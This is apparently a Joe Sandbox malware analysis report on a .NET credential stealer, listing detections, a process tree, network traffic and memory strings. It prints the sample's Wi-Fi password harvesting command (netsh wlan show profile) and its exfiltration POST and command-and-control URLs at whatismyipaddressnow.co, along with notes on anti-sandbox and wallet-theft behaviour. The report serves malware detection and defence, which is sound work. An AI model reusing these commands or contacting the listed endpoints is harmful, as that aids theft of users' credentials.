Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
14posdLrGh.exe

Overview

General Information

Sample name:14posdLrGh.exe
renamed because original name is a hash value
Original sample name:52f30bf4980337fd9e150ac186c5c04d08674bacc468235ecf2ab8f925f889be.exe
Analysis ID:1438234
MD5:b10b3047a2a4a6d75ddb3633906f2613
SHA1:ba4f259d0f41e32ba20cd207b3af46fc430a884b
SHA256:52f30bf4980337fd9e150ac186c5c04d08674bacc468235ecf2ab8f925f889be
Tags:exe
Infos:

Detection

PXRECVOWEIWOEI Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected AntiVM3
Yara detected PXRECVOWEIWOEI Stealer
.NET source code contains potential unpacker
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • 14posdLrGh.exe (PID: 6516 cmdline: "C:\Users\user\Desktop\14posdLrGh.exe" MD5: B10B3047A2A4A6D75DDB3633906F2613)
    • cmd.exe (PID: 6988 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 2316 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
      • netsh.exe (PID: 6948 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • findstr.exe (PID: 7084 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
  • msiexec.exe (PID: 1780 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1677581277.0000000002919000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PXRECVOWEIWOEIYara detected PXRECVOWEIWOEI StealerJoe Security
    00000000.00000002.1677581277.00000000024D7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: 14posdLrGh.exe PID: 6516JoeSecurity_PXRECVOWEIWOEIYara detected PXRECVOWEIWOEI StealerJoe Security
        Process Memory Space: 14posdLrGh.exe PID: 6516JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: 14posdLrGh.exe PID: 6516JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security

            Sigma Signatures

            Stealing of Sensitive Information

            barindex
            Sigma detected: Capture Wi-Fi password
            Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\14posdLrGh.exe", ParentImage: C:\Users\user\Desktop\14posdLrGh.exe, ParentProcessId: 6516, ParentProcessName: 14posdLrGh.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 6988, ProcessName: cmd.exe

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: 14posdLrGh.exeAvira: detected
            Antivirus detection for URL or domain
            Source: https://whatismyipaddressnow.co/API/FETCH/getcountry.phpAvira URL Cloud: Label: malware
            Source: https://whatismyipaddressnow.co/API/FETCH/filter.php?countryid=14&token=KdudHBIkdYW9Avira URL Cloud: Label: phishing
            Multi AV Scanner detection for domain / URL
            Source: whatismyipaddressnow.coVirustotal: Detection: 8%Perma Link
            Source: http://whatismyipaddressnow.coVirustotal: Detection: 8%Perma Link
            Source: https://whatismyipaddressnow.co/API/FETCH/getcountry.phpVirustotal: Detection: 12%Perma Link
            Source: https://whatismyipaddressnow.co/API/FETCH/filter.php?countryid=14&token=KdudHBIkdYW9Virustotal: Detection: 8%Perma Link
            Source: https://whatismyipaddressnow.coVirustotal: Detection: 8%Perma Link
            Multi AV Scanner detection for submitted file
            Source: 14posdLrGh.exeReversingLabs: Detection: 31%
            Source: 14posdLrGh.exeVirustotal: Detection: 38%Perma Link
            Machine Learning detection for sample
            Source: 14posdLrGh.exeJoe Sandbox ML: detected
            Source: unknownHTTPS traffic detected: 172.67.143.245:443 -> 192.168.2.4:49730 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 172.67.143.245:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: 14posdLrGh.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 4x nop then jmp 008814DFh0_2_008811D3
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_00882A85
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_00882A90
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_057A03AC
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_057A6FA8
            Source: global trafficHTTP traffic detected: GET /API/FETCH/filter.php?countryid=14&token=KdudHBIkdYW9 HTTP/1.1Host: whatismyipaddressnow.coConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /API/FETCH/getcountry.php HTTP/1.1Content-Type: multipart/form-data; boundary=---TelegramBotAPI_638507840859530506Host: whatismyipaddressnow.coContent-Length: 5314Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
            Source: Joe Sandbox ViewIP Address: 172.67.143.245 172.67.143.245
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: whatismyipaddressnow.co
            Source: unknownDNS query: name: whatismyipaddressnow.co
            Source: unknownDNS query: name: icanhazip.com
            Source: unknownDNS query: name: icanhazip.com
            Source: unknownDNS query: name: ip-api.com
            Source: unknownHTTPS traffic detected: 172.67.143.245:443 -> 192.168.2.4:49730 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /API/FETCH/filter.php?countryid=14&token=KdudHBIkdYW9 HTTP/1.1Host: whatismyipaddressnow.coConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: whatismyipaddressnow.co
            Source: global trafficDNS traffic detected: DNS query: icanhazip.com
            Source: global trafficDNS traffic detected: DNS query: 114.82.9.0.in-addr.arpa
            Source: global trafficDNS traffic detected: DNS query: ip-api.com
            Source: unknownHTTP traffic detected: POST /API/FETCH/getcountry.php HTTP/1.1Content-Type: multipart/form-data; boundary=---TelegramBotAPI_638507840859530506Host: whatismyipaddressnow.coContent-Length: 5314Connection: Keep-Alive
            Source: cert9.db.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: cert9.db.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: cert9.db.0.drString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: cert9.db.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: cert9.db.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: cert9.db.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: cert9.db.0.drString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.000000000259B000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1677581277.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.000000000280F000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1677581277.0000000002894000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.000000000280F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
            Source: cert9.db.0.drString found in binary or memory: http://ocsp.digicert.com0
            Source: cert9.db.0.drString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.0000000002491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.0000000002919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://whatismyipaddressnow.co
            Source: cert9.db.0.drString found in binary or memory: http://x1.c.lencr.org/0
            Source: cert9.db.0.drString found in binary or memory: http://x1.i.lencr.org/0
            Source: 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003608000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003536000.00000004.00000800.00020000.00000000.sdmp, tmpA7A9.tmp.dat.0.dr, tmp6564.tmp.dat.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003608000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003536000.00000004.00000800.00020000.00000000.sdmp, tmpA7A9.tmp.dat.0.dr, tmp6564.tmp.dat.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003608000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003536000.00000004.00000800.00020000.00000000.sdmp, tmpA7A9.tmp.dat.0.dr, tmp6564.tmp.dat.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003608000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003536000.00000004.00000800.00020000.00000000.sdmp, tmpA7A9.tmp.dat.0.dr, tmp6564.tmp.dat.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.000000000275F000.00000004.00000800.00020000.00000000.sdmp, tmp3F88.tmp.dat.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: tmp3F88.tmp.dat.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=enWeb
            Source: 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003608000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003536000.00000004.00000800.00020000.00000000.sdmp, tmpA7A9.tmp.dat.0.dr, tmp6564.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003608000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003536000.00000004.00000800.00020000.00000000.sdmp, tmpA7A9.tmp.dat.0.dr, tmp6564.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003608000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003536000.00000004.00000800.00020000.00000000.sdmp, tmpA7A9.tmp.dat.0.dr, tmp6564.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.0000000002653000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.micro
            Source: tmp57A8.tmp.dat.0.drString found in binary or memory: https://support.mozilla.org
            Source: tmp57A8.tmp.dat.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.000000000252A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
            Source: tmp57A8.tmp.dat.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.0000000002653000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1677581277.00000000028FA000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003736000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.000000000351E000.00000004.00000800.00020000.00000000.sdmp, tmpCE60.tmp.dat.0.dr, tmp1A47.tmp.dat.0.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003711000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, tmpCE60.tmp.dat.0.dr, tmp1A47.tmp.dat.0.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.0000000002653000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1677581277.00000000028FA000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003736000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.000000000351E000.00000004.00000800.00020000.00000000.sdmp, tmpCE60.tmp.dat.0.dr, tmp1A47.tmp.dat.0.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003711000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, tmpCE60.tmp.dat.0.dr, tmp1A47.tmp.dat.0.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.0000000002919000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1677581277.0000000002491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatismyipaddressnow.co
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.0000000002491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatismyipaddressnow.co/API/FETCH/filter.php?countryid=14&token=KdudHBIkdYW9
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatismyipaddressnow.co/API/FETCH/getcountry.php
            Source: 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003608000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003536000.00000004.00000800.00020000.00000000.sdmp, tmpA7A9.tmp.dat.0.dr, tmp6564.tmp.dat.0.drString found in binary or memory: https://www.ecosia.org/newtab/
            Source: 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003608000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003536000.00000004.00000800.00020000.00000000.sdmp, tmpA7A9.tmp.dat.0.dr, tmp6564.tmp.dat.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: tmp57A8.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.000000000252A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.000000000252A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/LR
            Source: tmp57A8.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.000000000252A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.000000000252A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/LR
            Source: tmp57A8.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.000000000252A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
            Source: 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003886000.00000004.00000800.00020000.00000000.sdmp, tmp57A8.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.000000000252A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/LR
            Source: tmp57A8.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.000000000252A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.000000000252A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/LR
            Source: 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003886000.00000004.00000800.00020000.00000000.sdmp, tmp57A8.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.00000000028BF000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1677581277.00000000028FA000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1677581277.000000000275F000.00000004.00000800.00020000.00000000.sdmp, tmpCF47.tmp.dat.0.drString found in binary or memory: https://www.office.com/
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.00000000028BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/LR
            Source: tmpCF47.tmp.dat.0.drString found in binary or memory: https://www.office.com/Office
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownHTTPS traffic detected: 172.67.143.245:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: C:\Users\user\Desktop\14posdLrGh.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_008810500_2_00881050
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_008811D30_2_008811D3
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_00883A080_2_00883A08
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_008810400_2_00881040
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_00882CC00_2_00882CC0
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_057A44400_2_057A4440
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_057A52700_2_057A5270
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_057A3EF00_2_057A3EF0
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_059D32880_2_059D3288
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_059D1D080_2_059D1D08
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_059D33000_2_059D3300
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_059D1CF90_2_059D1CF9
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_059D2C710_2_059D2C71
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_05ADD4A10_2_05ADD4A1
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_05ADD6180_2_05ADD618
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_05CDD3200_2_05CDD320
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_05CD00060_2_05CD0006
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_05CF59200_2_05CF5920
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_05CF64080_2_05CF6408
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_05CF60300_2_05CF6030
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_05CD72D70_2_05CD72D7
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_05CD72E80_2_05CD72E8
            Source: 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003790000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameM3t4n01a.exeR vs 14posdLrGh.exe
            Source: 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003608000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameM3t4n01a.exeR vs 14posdLrGh.exe
            Source: 14posdLrGh.exe, 00000000.00000002.1680992621.0000000005580000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameM3t4n01a.exeR vs 14posdLrGh.exe
            Source: 14posdLrGh.exe, 00000000.00000000.1597768384.000000000090E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFree5will.exeJ vs 14posdLrGh.exe
            Source: 14posdLrGh.exe, 00000000.00000002.1676983867.000000000064E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 14posdLrGh.exe
            Source: 14posdLrGh.exeBinary or memory string: OriginalFilenameFree5will.exeJ vs 14posdLrGh.exe
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/18@4/3
            Source: C:\Users\user\Desktop\14posdLrGh.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\14posdLrGh.exe.logJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeMutant created: NULL
            Source: C:\Users\user\Desktop\14posdLrGh.exeMutant created: \Sessions\1\BaseNamedObjects\610930
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7068:120:WilError_03
            Source: C:\Users\user\Desktop\14posdLrGh.exeFile created: C:\Users\user\AppData\Local\Temp\fqs92o4p.default-releaseJump to behavior
            Source: 14posdLrGh.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 14posdLrGh.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\14posdLrGh.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\14posdLrGh.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.000000000254F000.00000004.00000800.00020000.00000000.sdmp, tmp5884.tmp.dat.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 14posdLrGh.exeReversingLabs: Detection: 31%
            Source: 14posdLrGh.exeVirustotal: Detection: 38%
            Source: unknownProcess created: C:\Users\user\Desktop\14posdLrGh.exe "C:\Users\user\Desktop\14posdLrGh.exe"
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
            Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profileJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: wldp.dllJump to behavior
